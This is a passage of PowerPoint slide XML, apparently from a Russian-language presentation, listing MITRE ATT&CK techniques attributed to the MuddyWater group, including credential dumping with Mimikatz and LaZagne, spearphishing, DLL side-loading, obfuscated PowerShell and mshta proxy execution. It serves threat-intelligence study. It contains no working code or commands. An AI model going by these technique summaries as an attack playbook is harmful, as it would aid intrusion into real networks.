                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru" sz="1550">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:uFill>
                  <a:noFill/>
                </a:uFill>
                <a:hlinkClick r:id="rId31">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>Deobfuscate/Decode Files or Information</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="1550">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>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decoded base64-encoded PowerShell commands using a VBS file.</a:t>
            </a:r>
            <a:endParaRPr sz="1550" b="1" i="1" u="sng">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru" sz="1550">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:uFill>
                  <a:noFill/>
                </a:uFill>
                <a:hlinkClick r:id="rId32">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>Encrypted Channel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="1550">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="1550">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:uFill>
                  <a:noFill/>
                </a:uFill>
                <a:hlinkClick r:id="rId33">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>Symmetric Cryptography</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="1550">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="1550" b="1" i="1" u="sng">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId5">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>MuddyWater</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="1550" b="1" i="1" u="sng">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> has used AES to encrypt C2 responses.</a:t>
            </a:r>
            <a:endParaRPr sz="1550" b="1" i="1" u="sng">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Average"/>
              <a:ea typeface="Average"/>
              <a:cs typeface="Average"/>
              <a:sym typeface="Average"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pP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body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="18450" y="35250"/>
            <a:ext cx="9107100" cy="5073000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>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Exfiltration Over C2 Channel</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C2 infrastructure to receive exfiltrated data.</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Exploit Public-Facing Application</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exploited the Microsoft Exchange memory corruption vulnerability (CVE-2020-0688).</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Exploitation for Client Execution</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exploited the Office vulnerability CVE-2017-0199 for execution.</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Exploitation of Remote Services</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exploited the Microsoft Netlogon vulnerability (CVE-2020-1472).</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File and Directory Discovery</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malware that checked if the ProgramData folder had folders or files with the keywords "Kasper," "Panda," or "ESET."</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Gather Victim Identity Information</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10">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>Email Addresses</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specifically targeted government agency employees with spearphishing e-mails.</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11">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>Hijack Execution Flow</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12">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>DLL Side-Loading</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maintains persistence on victim networks through side-loading dlls to trick legitimate programs into running malware.</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13">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>Impair Defenses</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14">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>Disable or Modify Tools</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can disable the system's local proxy settings.</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15">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>Ingress Tool Transfer</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malware that can upload additional files to the victim’s machine.</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16">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>Inter-Process Communication</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17">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>Component Object Model</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malware that has the capability to execute malicious code via COM, DCOM, and Outlook.</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16">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>Inter-Process Communication</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18">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>Dynamic Data Exchange</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malware that can execute PowerShell scripts via DDE.</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19">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>Masquerading</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20">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>Match Legitimate Name or Location</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disguised malicious executables and used filenames and Registry key names associated with Windows Defender.</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21">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>Multi-Stage Channels</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one C2 to obtain enumeration scripts and monitor web logs, but a different C2 to send data back.</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22">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>Obfuscated Files or Information</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Daniel Bohannon’s Invoke-Obfuscation framework and obfuscated PowerShell scripts. The group has also used other obfuscation methods, including Base64 obfuscation of VBScripts and PowerShell commands.</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23">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>Steganography</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stored obfuscated JavaScript code in an image file named temp.jpg.</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24">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>Compile After Delivery</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the .NET csc.exe tool to compile executables from downloaded C# code.</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25">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>Obtain Capabilities</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26">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>Tool</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="950">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="950" b="1" i="1" u="sng">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>MuddyWater has made use of legitimate tools ConnectWise and Remote Utilities to gain access to target environment.</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27">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>Office Application Startup</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28">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>Office Template Macros</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a Word Template, Normal.dotm, for persistence.</a:t>
            </a:r>
            <a:endParaRPr sz="950" b="1" i="1" u="sng">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru" sz="950">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:uFill>
                  <a:noFill/>
                </a:uFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
                <a:hlinkClick r:id="rId29">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>OS Credential Dumping</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30">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>LSASS Memory</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="950">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="95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performed credential dumping with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="950" b="1" i="1" u="sng">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
                <a:hlinkClick r:id="rId31">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>Mimikatz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="950" b="1" i="1" u="sng">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> and procdump64.exe.</a:t>
            </a:r>
            <a:endParaRPr sz="950" b="1" i="1" u="sng">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OS Credential Dumping</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LSA Secrets</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performed credential dumping with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="950" b="1" i="1" u="sng">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
                <a:hlinkClick r:id="rId6">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>LaZagne</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="950" b="1" i="1" u="sng">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>.</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OS Credential Dumping</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Cached Domain Credentials</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performed credential dumping with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="950" b="1" i="1" u="sng">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
                <a:hlinkClick r:id="rId6">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>LaZagne</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="950" b="1" i="1" u="sng">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>.</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Phishing</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Spearphishing Attachment</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compromised third parties and used compromised accounts to send spearphishing emails with targeted attachments to recipients.</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Phishing</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10">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>Spearphishing Link</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sent targeted spearphishing e-mails with malicious links.</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11">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>Process Discovery</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malware to obtain a list of running processes on the system.</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12">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>Proxy</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13">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>External Proxy</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controlled </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="950" b="1" i="1" u="sng">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
                <a:hlinkClick r:id="rId14">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>POWERSTATS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="950" b="1" i="1" u="sng">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> from behind a proxy network to obfuscate the C2 location.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="950" b="1" i="1" u="sng">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
                <a:hlinkClick r:id="rId15">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>[3]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="950" b="1" i="1" u="sng">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>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a series of compromised websites that victims connected to randomly to relay information to command and control (C2).</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16">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>Remote Access Software</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a legitimate application, ScreenConnect, to manage systems remotely and move laterally.</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17">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>Scheduled Task/Job</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18">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>Scheduled Task</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scheduled tasks to establish persistence.</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19">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>Screen Capture</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malware that can capture screenshots of the victim’s machine.</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20">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>Software Discovery</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a PowerShell backdoor to check for Skype connectivity on the target machine.</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21">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>Security Software Discovery</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malware to check running processes against a hard-coded list of security tools often used by malware researchers.</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22">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>System Binary Proxy Execution</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23">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>CMSTP</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CMSTP.exe and a malicious INF to execute its </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="950" b="1" i="1" u="sng">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
                <a:hlinkClick r:id="rId14">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>POWERSTATS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="950" b="1" i="1" u="sng">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> payload.</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22">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>System Binary Proxy Execution</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24">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>Mshta</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mshta.exe to execute its </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="950" b="1" i="1" u="sng">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
                <a:hlinkClick r:id="rId14">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>POWERSTATS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="950" b="1" i="1" u="sng">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> payload and to pass a PowerShell one-liner for execution.</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22">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>System Binary Proxy Execution</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25">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>Rundll32</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malware that leveraged rundll32.exe in a Registry Run key to execute a .dll.</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26">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
